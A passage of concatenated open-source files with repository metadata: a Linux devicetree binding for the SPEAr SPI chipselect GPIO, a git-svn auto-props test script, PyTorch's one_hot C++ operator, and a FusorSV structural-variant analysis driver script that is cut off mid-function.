directly control each PL022 chipselect. Hence, it is natural for SPEAr to
export the control of this interface as gpio.
properties:
compatible:
const: st,spear-spics-gpio
reg:
maxItems: 1
gpio-controller: true
'#gpio-cells':
const: 2
st-spics,peripcfg-reg:
description: Offset of the peripcfg register.
$ref: /schemas/types.yaml#/definitions/uint32
st-spics,sw-enable-bit:
description: Bit offset to enable software chipselect control.
$ref: /schemas/types.yaml#/definitions/uint32
st-spics,cs-value-bit:
description: Bit offset to drive chipselect low or high.
$ref: /schemas/types.yaml#/definitions/uint32
st-spics,cs-enable-mask:
description: Bitmask selecting which chipselects to enable.
$ref: /schemas/types.yaml#/definitions/uint32
st-spics,cs-enable-shift:
description: Bit shift for programming chipselect number.
$ref: /schemas/types.yaml#/definitions/uint32
required:
- compatible
- reg
- gpio-controller
- '#gpio-cells'
- st-spics,peripcfg-reg
- st-spics,sw-enable-bit
- st-spics,cs-value-bit
- st-spics,cs-enable-mask
- st-spics,cs-enable-shift
additionalProperties: false
examples:
- |
gpio@e0700000 {
compatible = "st,spear-spics-gpio";
reg = <0xe0700000 0x1000>;
st-spics,peripcfg-reg = <0x3b0>;
st-spics,sw-enable-bit = <12>;
st-spics,cs-value-bit = <11>;
st-spics,cs-enable-mask = <3>;
st-spics,cs-enable-shift = <8>;
gpio-controller;
#gpio-cells = <2>;
};
|
unknown
|
github
|
https://github.com/torvalds/linux
|
Documentation/devicetree/bindings/gpio/st,spear-spics-gpio.yaml
|
#!/bin/sh
#
# Copyright (c) 2008 Brad King
test_description='git svn dcommit honors auto-props'
. ./lib-git-svn.sh
# Emit an svn client config; $1 ("yes"/"no") toggles enable-auto-props.
# The auto-props rules set mime-type/eol-style for *.sh and *.txt files.
generate_auto_props() {
cat << EOF
[miscellany]
enable-auto-props=$1
[auto-props]
*.sh = svn:mime-type=application/x-shellscript; svn:eol-style=LF
*.txt = svn:mime-type=text/plain; svn:eol-style = native
EOF
}
# Seed the svn repository with a single file and clone it via git svn.
test_expect_success 'initialize git svn' '
	mkdir import &&
	(
		cd import &&
		echo foo >foo &&
		svn_cmd import -m "import for git svn" . "$svnrepo"
	) &&
	rm -rf import &&
	git svn init "$svnrepo" &&
	git svn fetch
	'
# Write a config dir with auto-props turned ON.
test_expect_success 'enable auto-props config' '
	mkdir user &&
	generate_auto_props yes >user/config
	'
# Commit files that match the auto-props patterns while enabled.
test_expect_success 'add files matching auto-props' '
	write_script exec1.sh </dev/null &&
	echo "hello" >hello.txt &&
	echo bar >bar &&
	git add exec1.sh hello.txt bar &&
	git commit -m "files for enabled auto-props" &&
	git svn dcommit --config-dir=user
	'
# Rewrite the config dir with auto-props turned OFF.
test_expect_success 'disable auto-props config' '
	generate_auto_props no >user/config
	'
# Commit matching files while disabled: no properties should be applied.
test_expect_success 'add files matching disabled auto-props' '
	write_script exec2.sh </dev/null &&
	echo "world" >world.txt &&
	echo zot >zot &&
	git add exec2.sh world.txt zot &&
	git commit -m "files for disabled auto-props" &&
	git svn dcommit --config-dir=user
	'
# Check out the svn side and verify which properties each commit produced.
test_expect_success 'check resulting svn repository' '
	(
		mkdir work &&
		cd work &&
		svn_cmd co "$svnrepo" &&
		cd svnrepo &&
		# Check properties from first commit.
		if test_have_prereq POSIXPERM
		then
			test "x$(svn_cmd propget svn:executable exec1.sh)" = "x*"
		fi &&
		test "x$(svn_cmd propget svn:mime-type exec1.sh)" = \
			"xapplication/x-shellscript" &&
		test "x$(svn_cmd propget svn:mime-type hello.txt)" = "xtext/plain" &&
		test "x$(svn_cmd propget svn:eol-style hello.txt)" = "xnative" &&
		test "x$(svn_cmd propget svn:mime-type bar)" = "x" &&
		# Check properties from second commit.
		if test_have_prereq POSIXPERM
		then
			test "x$(svn_cmd propget svn:executable exec2.sh)" = "x*"
		fi &&
		test "x$(svn_cmd propget svn:mime-type exec2.sh)" = "x" &&
		test "x$(svn_cmd propget svn:mime-type world.txt)" = "x" &&
		test "x$(svn_cmd propget svn:eol-style world.txt)" = "x" &&
		test "x$(svn_cmd propget svn:mime-type zot)" = "x"
	)
	'
# A rename should re-apply auto-props based on the new file name.
test_expect_success 'check renamed file' '
	test -d user &&
	generate_auto_props yes > user/config &&
	git mv foo foo.sh &&
	git commit -m "foo => foo.sh" &&
	git svn dcommit --config-dir=user &&
	(
		cd work/svnrepo &&
		svn_cmd up &&
		test ! -e foo &&
		test -e foo.sh &&
		test "x$(svn_cmd propget svn:mime-type foo.sh)" = \
			"xapplication/x-shellscript" &&
		test "x$(svn_cmd propget svn:eol-style foo.sh)" = "xLF"
	)
	'
test_done
|
unknown
|
github
|
https://github.com/git/git
|
t/t9124-git-svn-dcommit-auto-props.sh
|
#define TORCH_ASSERT_ONLY_METHOD_OPERATORS
#include <ATen/core/Tensor.h>
#include <ATen/DTensorState.h>
#ifndef AT_PER_OPERATOR_HEADERS
#include <ATen/Functions.h>
#include <ATen/NativeFunctions.h>
#else
#include <ATen/ops/arange.h>
#include <ATen/ops/empty.h>
#include <ATen/ops/eq.h>
#include <ATen/ops/one_hot_native.h>
#include <ATen/ops/zeros.h>
#endif
namespace at::native {
// Expand an index tensor `self` (dtype must be Long) into a one-hot encoding
// along a new trailing dimension of size `num_classes`.  Passing
// num_classes == -1 infers the class count as self.max() + 1.
Tensor one_hot(const Tensor &self, int64_t num_classes) {
    TORCH_CHECK(self.dtype() == kLong, "one_hot is only applicable to index tensor of type LongTensor.");
    // using meta bit test to catch Fake Tensor as well until __torch_function__
    if (self.key_set().has_all(DispatchKeySet(BackendComponent::MetaBit)) ||
        self.key_set().has_all(DispatchKeySet(DispatchKey::Python))) {
        // functional version that torch.compiles better and works with dynamic shapes
        if (num_classes == -1) {
            num_classes = self.max().item().toLong() + 1;
        }
        {
            // If `self` is a DTensor, then allow implicit replication
            // of the `index` Tensor.
            at::DTensorAllowImplicitReplication guard;
            // Compare each index against [0, num_classes): equality gives the
            // one-hot pattern directly, then cast bool -> Long.
            at::Tensor index = at::arange(num_classes, self.options());
            return at::eq(self.unsqueeze(-1), index).to(kLong);
        }
    }
    auto shape = self.sym_sizes().vec();
    // empty tensor could be converted to one hot representation,
    // but shape inference is not possible.
    if (self.sym_numel() == 0) {
        if (num_classes <= 0) {
            TORCH_CHECK(false, "Can not infer total number of classes from empty tensor.");
        } else {
            shape.emplace_back(num_classes);
            return at::empty_symint(shape, self.options());
        }
    }
    // non-empty tensor
    if (self.device().type() != at::kCUDA && self.device().type() != at::kMPS &&
        self.device().type() != at::kPrivateUse1 && self.device().type() != at::kXLA) {
        // for cuda, rely on device assert thrown by scatter
        TORCH_CHECK(self.min().item().toLong() >= 0, "Class values must be non-negative.");
    }
    if (num_classes == -1) {
        num_classes = self.max().item().toLong() + 1;
    } else {
        if (self.device().type() != at::kCUDA && self.device().type() != at::kMPS &&
            self.device().type() != at::kPrivateUse1 && self.device().type() != at::kXLA) {
            // rely on device asserts from scatter to avoid sync here
            TORCH_CHECK(num_classes > self.max().item().toLong(), "Class values must be smaller than num_classes.");
        } else {
            //for cuda, assert that num_classes is at least 1
            TORCH_CHECK(num_classes >= 1, "num_classes should be positive");
        }
    }
    // Scatter 1s into a zero tensor along the new trailing class dimension.
    shape.emplace_back(num_classes);
    Tensor ret = at::zeros_symint(shape, self.options());
    ret.scatter_(-1, self.unsqueeze(-1), 1);
    return ret;
}
} // namespace at::native
|
cpp
|
github
|
https://github.com/pytorch/pytorch
|
aten/src/ATen/native/Onehot.cpp
|
#!/usr/bin/env python
import argparse
import glob
import gc
import os
import time
import multiprocessing as mp
#pip installed libs
import numpy as np
#local libs
import fusorsv.svu_utils as su
import fusorsv.read_utils as ru
import fusorsv.fusor_utils as fusor
des = """
FusorSV - A Data Fusion Method for Multi Source (VCF4.0+) Structural Variation Analysis
Timothy James Becker, PhD candidate, UCONN 05/25/2016-06/19/2018\n version="""+fusor.fu.__version__
parser = argparse.ArgumentParser(description=des,formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-r', '--ref_path',type=str, help='reference fasta needed to write vcf or g1k output files\t[None]')
des = """
input directory with sample named folders and caller id tagged vcf files
[EX] /path/sample/sample_S4.vcf implies that there are calls of id 4 for sample\t[None]"""
parser.add_argument('-i', '--in_dir',type=str, help=des)
parser.add_argument('-a', '--ctg_dir',type=str,help='assembly contig directory\t[None]')
parser.add_argument('-c', '--chroms',type=str,help='comma seperated chrom listing\t[1,2,...22,X,Y,MT]')
parser.add_argument('-o', '--out_dir',type=str, help='outputdirectory to save ...bam.bai/ into\t[None]')
parser.add_argument('-m', '--sv_mask',type=str,help='user supplied svmask file in BED3 or internal json format\t[None]')
parser.add_argument('-f', '--apply_fusion_model_path',type=str, help='apply a fusion model *.pickle.gz')
parser.add_argument('-p', '--cpus',type=int,help='number of cores to use in ||\t[1]')
parser.add_argument('--k_fold',type=int,help='k_fold cross validation, k=0 implies no validation\t[0]')
parser.add_argument('--n_k',type=int,help='number of times to do k_fold\t[1]')
parser.add_argument('--bins',type=int,help='number of requested discriminating features\t[14]')
parser.add_argument('--obs',type=int,help='number of observations needed per bin\t[1000]')
parser.add_argument('--min_g',type=float,help='minimum group expectation contribution\t[0.0]')
parser.add_argument('--over_m',type=float,help='overlap allowed before removal in merge step\t[0.0]')
parser.add_argument('--pre_cluster',action='store_true', help='cluster the calls for all samples first\t[False]')
parser.add_argument('--smoothing',action='store_true', help='brkpt_smoothing algo\t[False]')
parser.add_argument('--detail',action='store_true',help='provide a more detailed output\t[False]')
stage_mapping = """
1:1 mapping of caller ids to stage names (and back):
stage_map_json_file -> {0:'True',-1:'fusorSV',1:'MetaSV',4:'BreakDancer',9:'cnMOPS',10:'CNVnator',
11:'Delly',13:'GATK',14:'GenomeSTRiP',17:'Hydra',18:'Lumpy',35:'BreakSeq',
36:'Pindel',38:'Tigra'}\t[../data/stage_map.json]
"""
parser.add_argument('-S', '--stage_map_json_file',type=str,help=stage_mapping)
parser.add_argument('-E', '--stage_exclude_list',type=str,help='comma seperated id list to exclude from test/training\t[1,13,36]')
parser.add_argument('-F', '--sample_folder_exclude',type=str,help='comma seperated folder names to exclude\t[None]')
parser.add_argument('-M', '--cluster_overlap',type=float,help='reciprocal overlap needed for clustering\t[0.5]')
parser.add_argument('-L', '--lift_over',type=str,help='liftover chain file path or default\t[./data/hg19ToHg38.over.chain.gz]')
parser.add_argument('-C', '--clean', action='store_true',help='keep all kfold run data and print extra details\t[False]')
parser.add_argument('-T', '--test_libs', action='store_true', help='test the installation libraries and print version\t[False]')
parser.add_argument('--no_merge',action='store_true',help='set to not merge output for large sample applications\t[False]')
parser.add_argument('--merge',action='store_true',help='perform a merge and exit for large sample applications\t[False]')
args = parser.parse_args()
# ---- option validation / normalization (runs at import time) ----------------
# Each block below resolves one CLI option into a module-level variable that
# the worker functions and the __main__ driver read as globals.
if args.test_libs: #library tester should load all imports here
    # smoke-test the compiled fusion_utils extension with a tiny known overlap
    import fusion_utils as fu
    x1,x2 = [[0,100,0,[],0,0,{}]],[[51,151,0,[],0,0,{}]]
    F = fu.LR_no_idx(x1,x2)
    T = [49,151,50,50]
    if all([T[i]==(F[i][0][1]-F[i][0][0]) for i in range(len(T))]):
        print('fusion_utils.so and bindings are functional!\nversion='+fu.__version__)
    else:
        print('error with library imports, check your installation')
    quit(0)
if args.in_dir is not None:
    in_dir = args.in_dir
    if not os.path.exists(in_dir):
        print('VCF input path does not exist!')
        raise IOError
elif args.merge:
    # --merge mode doesn't need VCF inputs, only the out_dir VCF glob below
    print('final FusorSV VCF merge starting')
else:
    print('no VCF input')
    raise IOError
if args.out_dir is not None:
    out_dir = args.out_dir
else:
    print('no output directory specified')
    raise IOError
if args.apply_fusion_model_path is not None:
    if args.apply_fusion_model_path.upper()=='DEFAULT':
        apply_fusion_model_path =ru.get_local_path('models/human_g1k_v37_decoy.P3.pickle.gz')
    else:
        apply_fusion_model_path = args.apply_fusion_model_path
    if not os.path.exists(apply_fusion_model_path):
        print('fusion model path does not exist!')
        raise IOError
else:
    apply_fusion_model_path = None #implies you will make one with true input
if args.ctg_dir is not None:
    ctg_dir = args.ctg_dir
else:
    print('no contig directory specified')
    ctg_dir = None
if args.ref_path is not None:
    ref_path = args.ref_path
else:
    ref_path = ''
    print('ref_path not provided, will not be able to write a vcf and g1k file')
write_stats = True #new default
write_vcf_g1k = True #new default
write_model = True #new default
# numeric knobs, each falling back to a hard default when unset
if args.k_fold is not None: cross_fold = args.k_fold
else: cross_fold = 1
if args.n_k is not None and cross_fold > 1: n_cross = args.n_k
else: n_cross = 1
if args.cpus is not None: cpus = args.cpus
else: cpus = 1
if args.bins is not None: beta = args.bins
else: beta = 16
if args.obs is not None: obs = args.obs
else: obs = 1000
if args.min_g is not None: min_g = args.min_g
else: min_g = 0.0
if args.over_m is not None: over_m = args.over_m
else: over_m = 1E-10 #1bp overlap in a human genome = 3E-9
if args.chroms is not None:
    chroms = args.chroms.split(',')
else:
    chroms = [str(i) for i in range(1,23)]+['X','Y','MT'] #limit to chroms of interest
if args.cluster_overlap is not None: cluster_overlap = args.cluster_overlap
else: cluster_overlap = 0.0
if args.lift_over is not None:
    if args.lift_over.upper()=='DEFAULT': #need to do -L default to get default
        lift_over = ru.get_local_path('liftover/hg19ToHg38.over.chain.gz') #default
    else: lift_over = args.lift_over #lift over file for downstream analysis
else: lift_over = None
#load a user defined stage mapping id or use the one provided
if args.stage_map_json_file is not None:
    callers= ru.get_stage_map(args.stage_map_json_file) #user can supply a seperate stage map
    if callers == {}: #-1 is reserved for FusorSV and 0 for true
        callers = ru.get_stage_map(ru.get_local_path('stage_map.json'))
else:
    callers = ru.get_stage_map(ru.get_local_path('stage_map.json'))
stage_exclude_list = [1,13,36] #default exclude list
if args.stage_exclude_list is not None:
    try:
        stage_exclude_list = [int(i) for i in args.stage_exclude_list.rsplit(',')]
        print('using stage id exclude list:%s'%stage_exclude_list)
    except Exception as E:
        print('error parsing comma seperated list, using defaults')
        print('defaults stage exclude list is: %s'%stage_exclude_list)
#seperate merging out batched FusorSV call VCFs
vcf_glob = out_dir+'/vcf/*_S-1.vcf' #fusorSV VCFS only
if args.merge:
    # merge-only fast path: cluster-merge per-sample FusorSV VCFs and exit
    tst_str = 'FULL'
    ref_seq = {'.'.join(ref_path.rsplit('/')[-1].rsplit('.')[0:-1]):ru.read_fasta(ref_path)}
    print('cluster merging tool processing samples')
    out_vcf = out_dir+'/vcf/all_samples_genotypes.'+tst_str+'.vcf'
    # NOTE(review): ref_seq.keys()[0] is Python 2 syntax; under Python 3
    # dict.keys() is a view and this raises TypeError — the whole script
    # appears to target Python 2 (see also has_key and integer division below)
    print('completed = %s'%su.fusorSV_vcf_multi_sample_merge(vcf_glob,out_vcf,
                                                            ref_seq[ref_seq.keys()[0]],
                                                            overlap=cluster_overlap))
    if lift_over is not None:
        #now do a liftover to partition the calls with a possible new reference space
        su.fusorSV_vcf_liftover_samples(out_dir+'/vcf/all_samples_genotypes*.vcf*',ref_path,lift_over) #default is on
    n_stop = time.time()
    print(''.join([':::' for i in range(40)]))
    exit(0)
# -r -i -o -M 0.5 -L --merge
def get_observations(in_dir): #will look for .tar.gz file or glob the uncompressed folder
    """Placeholder: scan *in_dir* for observation archives.

    Currently a stub that always returns an empty list — tar-archive/gzip
    support still needs to be refactored out of HTSeq before this can be
    implemented.
    """
    return []
result_list = [] #async queue to put results for || stages
def collect_results(result):
    """multiprocessing apply_async callback: accumulate one worker's return
    value into the module-level result_list (Pool callbacks execute in the
    parent process, so appending to this shared list is safe)."""
    result_list.append(result)
#[1] File Partitioning------------------------------------------------------------------
#read and convert to SVULTB all SV caller VCF inputs
#saving each partition to a seperate pickle file || by sample << partition
def partition_call_sets(sample,k,O,R,B,chroms,flt,flt_exclude,caller_exclude):
    """Worker: read one sample's caller VCFs, convert them to the internal
    SVUL form, apply the svmask filter regions R, then slice and partition
    by SV type/size bin B and write the partitions under out_dir+'/svul/'
    (out_dir is a module-level global set during option processing).

    Returns [sample_name, success_flag] for the async result queue.
    """
    sname = sample[sample.rfind('/')+1:] #extract sample identifier
    print('reading sample %s'%sname)
    sname_partition_path = out_dir+'/svul/'+sname #build path
    # B.keys() restricts parsing to the SV types the model has bins for
    S,V = su.vcf_glob_to_svultd(sample+'/*vcf',chroms,O,types=B.keys(),
                                vcf_flt=flt,flt_exclude=flt_exclude,
                                caller_exclude=caller_exclude)
    S = su.filter_call_sets2(S,R,exclude=flt_exclude) #filter svmasks
    Q = fusor.slice_samples([[sname,S]]) #legacy
    P = fusor.partition_sliced_samples(Q,B,exclude=caller_exclude) #partition
    success = fusor.write_partitions_by_sample(sname_partition_path,P) #write to disk
    return [sname,success] #report back to async queue
#[1] File Partitioning------------------------------------------------------------------
#[2] Pool Partitions--------------------------------------------------------------------
#this is || by partition: t, b
def merge_partitions(callers,t,b):
    """Worker: pool the on-disk partitions for one (type t, size bin b)
    across all callers (partitions live under out_dir+'/svul/', where
    out_dir is a module-level global).

    Returns [(t,b), P] for the async result queue, mirroring the key shape
    returned by prior_model_partition / post_model_partition.

    Fix: the original returned [sname,P], but no `sname` exists in this
    scope, so every call raised NameError; (t,b) is the only identifier
    available here.
    NOTE(review): sibling calls pass a caller_exclude argument to
    read_partitions_by_caller that this call omits — confirm the expected
    signature against fusor_utils before relying on this helper.
    """
    partition_path = out_dir+'/svul/'
    P = fusor.read_partitions_by_caller(partition_path,callers,t,b,False)
    return [(t,b),P]
#[2] Pool Partitions--------------------------------------------------------------------
#[3a] Fit the Model Partition----------------------------------------------------------------------------
def prior_model_partition(snames,t,b,k,callers,caller_exclude,min_g,brkpt_smoothing):
    """Worker: fit one (type t, size bin b) partition of the fusion model.

    Pools feature magnitudes and breakpoints across the training samples,
    derives group weights against the target caller id k, selects groups
    above min_g, and searches for the optimal filter cutoff (optionally
    with breakpoint smoothing).  Reads partitions from out_dir+'/svul/'
    (out_dir is a module-level global).

    Returns [(t,b), J, D, E, alpha, K] for the async result queue
    (consumed by fusor.assemble_model).
    """
    print('starting model partition:\tt=%s\tb=%s'%(t,b))
    start = time.time()
    P = fusor.read_partitions_by_caller(out_dir+'/svul/',callers,caller_exclude,t,b,False)
    #P,snames = fusor.pre_cluster_samples(P,r=0.9),['CLUSTER'] #optional preclustering
    T = fusor.target_by_sample(P,k) #extract the partitioned target
    J = fusor.all_samples_all_pairs_magnitudes(P,snames) #pool all feature magnitudes
    K = fusor.all_samples_all_callers_bkpts(P,snames) #pool all breakpoints
    D,NN = fusor.pooled_distance(J) #this is done inside the all_group_weights as well
    W = fusor.all_group_weights(J,k,mode='j') #pooled D,NN and all group weights
    E = fusor.select_groups(W,min_g) #gamma is a group selection cutoff
    A = fusor.pileup_group_by_sample(P,E,(k,)) #now its just one partition here
    if brkpt_smoothing:
        print('optimizing model partition with brkpt smoothing:\tt=%s\tb=%s'%(t,b))
        alpha = fusor.target_filter_cutoff_exhaustive_brkpt(A,P,T,E,K)
        stop = time.time()
        print('fusion model partition:\tt=%s\tb=%s\t%s sec\tcappa=%s'%(t,b,round(stop-start,2),alpha[t][b]))
    else:
        print('optimizing model partition:\tt=%s\tb=%s'%(t,b))
        alpha = fusor.target_filter_cutoff_exhaustive(A,E,T) #optimal cutoff location
        stop = time.time()
        print('fusion model partition:\tt=%s\tb=%s\t%s sec\talpha=%s'%(t,b,round(stop-start,2),alpha[t][b]))
    return [(t,b),J,D,E,alpha,K]
#[3a] Fit the Model Partition----------------------------------------------------------------------------
#[3b] Posterior Estimation Partition---------------------------------------------------------------------
def post_model_partition(apply_fusion_model_path,snames,t,b,k,callers,caller_exclude,min_g,smoothing):
    """Worker: posterior estimate for one (type t, size bin b) partition.

    With smoothing, loads the prior model from apply_fusion_model_path,
    reads the new data's partitions (from out_dir+'/svul/', a module
    global) and additively smooths the prior feature magnitudes with the
    new ones to produce updated group weights and filter cutoffs.
    Without smoothing, simply narrows the prior model down to the single
    (t,b) partition.

    Returns [(t,b), J_post, D_post, E_post, alpha_post, K] for the async
    result queue (consumed by fusor.assemble_model).
    """
    start = time.time()
    #[1] load prior model values----------------------------------------
    B,J,D,E,alpha,n,K = fusor.import_fusion_model(apply_fusion_model_path) #import the existing model
    if smoothing:
        print('starting posterior estimate on partition:\tt=%s\tb=%s'%(t,b))
        #[2] load new input data partitions
        P = fusor.read_partitions_by_caller(out_dir+'/svul/',callers,caller_exclude,t,b,False) #all samples
        J_new = fusor.all_samples_all_pairs_magnitudes(P,snames) #pool all feature magnitudes
        #[3] construct the posterior estimator using: the prior data, new data and imputed true row==k
        J_post = fusor.additive_magnitude_smoothing(J,J_new,k) #k is used to swap a row J_prime into J
        D_post,NN_post = fusor.pooled_distance(J_post) #get the new data distance matrix
        W_post = fusor.all_group_weights(J_post,k,mode='j') #calculate the pooled D,NN and all group weights
        E_post = fusor.select_groups(W_post,min_g) #gamma is a group selection cutoff
        alpha_post = fusor.post_filter_cutoff(E,E_post,alpha) #updated filter estimates
        stop = time.time()
        print('posterior estimate on partition:\tt=%s\tb=%s\t%s sec\talpha=%s'%(t,b,round(stop-start,2),
                                                                                alpha_post[t][b]))
    else:
        print('using prior estimate on partition:\tt=%s\tb=%s'%(t,b))
        J_post     = {t:{b:J[t][b]}}
        D_post     = {t:{b:D[t][b]}}
        E_post     = {t:{b:E[t][b]}}
        alpha_post = {t:{b:alpha[t][b]}}
        # Fix: narrow K the same way as the other model components.  The
        # original wrote `K[t] = {t:{b:K[t][b]}}`, which nested the slice
        # under an extra t key and corrupted the K[t][b] layout that the
        # downstream consumers index into.
        K = {t:{b:K[t][b]}}
        stop = time.time()
        print('prior estimate on partition:\tt=%s\tb=%s\t%s sec\talpha=%s' % (t,b,round(stop-start,2),
                                                                              alpha_post[t][b]))
    return [(t,b),J_post,D_post,E_post,alpha_post,K]
#[3b] Posterior Estimation Partition--------------------------------------------------------------------
#[4] Apply Model To Samples---------------------------------------------------------------------------------
#supports both single model training and posterior estimate via additive smoothing and diagnostics: mantel
def apply_model_to_samples(sample,ref_path,chroms,types,bins,callers,O,
                           model_path,apply_fusion_model_path,k,f_id,
                           over_m,r=0.5,smoothing=False,detail=False,verbose=False,IDX=6):
    """Worker: apply the fitted (or posterior) fusion model to one sample,
    write its FusorSV VCF, and score every caller against the target id k.

    Uses module-level globals partition_path, out_dir and snames set in
    __main__.  f_id is the FusorSV caller id (-1); IDX selects the slot in
    each call record that gets flagged with the target key.

    Returns [sample_name, cross_fold_stats, hist, detailed_stats] for the
    async result queue (consumed by fusor.assemble_stats).

    NOTE(review): dict.has_key below is Python-2-only syntax; under
    Python 3 this raises AttributeError — consistent with the rest of the
    script targeting Python 2.
    """
    sname = sample[sample.rfind('/')+1:] #extract sample identifier
    print('starting fusorSV discovery on sample %s'%sname)
    ref_seq = {'.'.join(ref_path.rsplit('/')[-1].rsplit('.')[0:-1]):ru.read_fasta(ref_path)} #~3GB
    hist,C = {},{}
    cross_fold_stats,detailed_stats = {c:{} for c in callers},{} #each single caller
    for t in types:
        for c in cross_fold_stats:
            if not t in cross_fold_stats[c]: cross_fold_stats[c][t] = []
    B,J,J_post,D,D_post,alpha,alpha_post,K,n,n_post = {},{},{},{},{},{},{},{},0,0
    #[1] apply the model here------------------------------------------------------------------------------
    if apply_fusion_model_path is None:#:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
        if verbose: print('loading base fusion model partitions for %s'%sname)
        B,J,D,E,alpha,n,K = fusor.import_fusion_model(model_path) #import the base model
        P = fusor.read_partitions_by_sample(partition_path,sname) #read all partitions for sname
        Q = fusor.unpartition_sliced_samples(P) #unpartition for merging later
        if verbose: print('projection of all call sets on %s'%sname)
        A = fusor.pileup_group_by_sample(P,E,(k,)) #projection of all calls for a sample
        F = fusor.filter_pileup_by_sample(A,alpha,leave_in=False) #filter using optimal cutof in the mode
        if smoothing:
            #now do breakpoint smoothing algorithm---------------------------------------------------------
            F = fusor.best_smooth_brkpt_samples(F,K,P)
            #now do breakpoint smoothing algorithm---------------------------------------------------------
        fusor.merge_filtered_samples(Q,F,f_id,snames,[],over_m)
    else:#:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
        if verbose: print('loading base and posterior estimate partitions for %s'%sname)
        B,J,D,E,alpha,n,K = fusor.import_fusion_model(apply_fusion_model_path) #import prior model
        if smoothing:
            B,J_post,D_post,E_post,alpha_post,n_post,K = fusor.import_fusion_model(model_path) #import new data
        P = fusor.read_partitions_by_sample(partition_path,sname) #read all partitions for sname
        Q = fusor.unpartition_sliced_samples(P) #unpartition for merging later
        A = fusor.pileup_group_by_sample(P,E,(k,)) #projection of all calls for a sample
        if smoothing:
            F = fusor.filter_pileup_by_sample(A,alpha,E_post,leave_in=False) # filter cutoff in the mode
        else:
            F = fusor.filter_pileup_by_sample(A,alpha,E,leave_in=False) # filter cutoff in the mode
        if smoothing:
            #now do breakpoint smoothing algorithm---------------------------------------------------------
            F = fusor.best_smooth_brkpt_samples(F,K,P)
            #now do breakpoint smoothing algorithm---------------------------------------------------------
        fusor.merge_filtered_samples(Q,F,f_id,snames,[],over_m) #expectation priorty merge back result
    #[2] do some scoring and write out the sample results, returning for global performance----------------
    start = time.time()
    for t in Q: #give the metrics for each sample and write out the result
        for c in set(cross_fold_stats).difference(set([f_id,k])):
            if verbose: print('%s%s'%(callers[c],''.join(['-' for i in range(80)]))) #other callers first
            cross_fold_stats[c][t] += [fusor.pretty_stats(Q,types,t,k,c,sname,r,verbose,smoothing)]
        if verbose: print('fusorSV%s'%(''.join(['-' for i in range(80)]))) #then fusorSV
        cross_fold_stats[f_id][t] += [fusor.pretty_stats(Q,types,t,k,f_id,sname,r,verbose,smoothing)]
        C[t] = []
        if Q[t].has_key(f_id) and Q[t][f_id].has_key(sname):
            C[t] = Q[t][f_id][sname]
            for i in cross_fold_stats[f_id][t][-1][6]:
                C[t][i][IDX][k] = [-1] #flag the idx with the target key and -1
    if verbose: print('writing VCF for %s'%sname)
    G = su.svult_to_genome(C,O) #start conversion back to VCF
    hist[sname] = su.genome_to_vcf(G,ref_seq,types,chroms,callers,
                                   out_dir+'/vcf/'+sname+'_S'+str(f_id)+'.vcf',sname,target_key=k) #VCF
    if detail:
        # optional per-size-bin breakdown for every caller
        for c in callers:
            detailed_stats[c] = {}
            for t in types:
                detailed_stats[c][t] = {}
                for i in range(len(B[t])-1):
                    detailed_stats[c][t][bins[t][i]] = []
        for t in Q:
            for c in set(detailed_stats.keys()).difference(set([f_id,k])): #do the other callers
                if verbose: print('%s%s'%(callers[c],''.join(['-' for x in range(80)])))
                T = fusor.pretty_bin_stats(Q,types,t,B,bins,k,c,sname,r,verbose,smoothing)
                for i in range(len(B[t])-1):
                    detailed_stats[c][t][bins[t][i]] = [T[bins[t][i]]]
            if verbose: print('fusorSV%s'%(''.join(['-' for i in range(80)])))
            T = fusor.pretty_bin_stats(Q,types,t,B,bins,k,f_id,sname,r,verbose,smoothing) #no fusorSV
            for i in range(len(B[t])-1):
                detailed_stats[f_id][t][bins[t][i]] = [T[bins[t][i]]]
    stop = time.time()
    if verbose: print('scoring completed for %s in %s sec'%(sname,round(stop-start,2)))
    return [sname,cross_fold_stats,hist,detailed_stats]
#[4] Apply Model To Samples--------------------------------------------------------------------------------
if __name__ == '__main__':
    # Driver: set up the output tree, partition every sample's calls, fit or
    # load a fusion model (optionally k-fold cross-validated), apply it to
    # each sample, then score/export/merge the results.
    full_start = time.time()
    if not os.path.exists(out_dir): os.makedirs(out_dir)
    if not os.path.exists(out_dir+'/tigra_ctg_map/'): os.makedirs(out_dir+'/tigra_ctg_map/')
    if not os.path.exists(out_dir+'/g1k/'): os.makedirs(out_dir+'/g1k/')
    if not os.path.exists(out_dir+'/vcf/'): os.makedirs(out_dir+'/vcf/')
    if not os.path.exists(out_dir+'/svul/'): os.makedirs(out_dir+'/svul/')
    if not os.path.exists(out_dir+'/models/'): os.makedirs(out_dir+'/models/')
    if not os.path.exists(out_dir+'/meta/'): os.makedirs(out_dir+'/meta/')
    if not os.path.exists(out_dir+'/visual/'): os.makedirs(out_dir+'/visual/')
    if not os.path.exists(out_dir+'/visual/bed/'): os.makedirs(out_dir+'/visual/bed/')
    files = glob.glob(in_dir+'*') #get all sample directories
    #entry here for correcting files from a .tar.gz
    samples,snames = [],[]
    for i in files:
        sname = i.rsplit('/')[-1]
        samples += [i]
        snames += [i.rsplit('/')[-1]]
    #snames,samples = snames[0:2],samples[0:2] #testing line
    print('processing samples %s\n for chroms %s'%(samples,chroms))
    coordinate_offset_json = ref_path.rsplit('/')[-1].rsplit('.fa')[0]+'_coordinates.json'
    if not os.path.isfile(out_dir+'/meta/'+coordinate_offset_json):
        print('making a new coordinate offset json file')
        ru.write_coordinate_offsets(ref_path,out_dir+'/meta/'+coordinate_offset_json)
    O = ru.get_coordinate_offsets(out_dir+'/meta/'+coordinate_offset_json) #must have a valid offset map
    R = [] #human callers work better with svmask
    if args.sv_mask is not None: #None if no mask desired
        # NOTE(review): sv_mask_json is only assigned in the .bed branch; a
        # .json mask falls through to get_mask_regions with sv_mask_json
        # unbound (NameError) — confirm intended behavior
        if args.sv_mask.endswith('.bed'):
            sv_mask_json = args.sv_mask.rsplit('/')[-1].rsplit('.bed')[0]+'_svmask.json'
            if not os.path.exists(out_dir+'/meta/'+sv_mask_json):
                ru.bed_mask_to_json_mask(args.sv_mask,out_dir+'/meta/'+sv_mask_json)
        elif args.sv_mask.endswith('.json'):
            ru.copy_json_mask(args.sv_mask,out_dir+'/meta/'+args.sv_mask.rsplit('/')[-1])
        #mask these regions------------------------------------------------------------------------------------
        R += ru.get_mask_regions(out_dir+'/meta/'+sv_mask_json,O) #svmask from ref complexity
        print('merging the svmask regions')
        start = time.time()
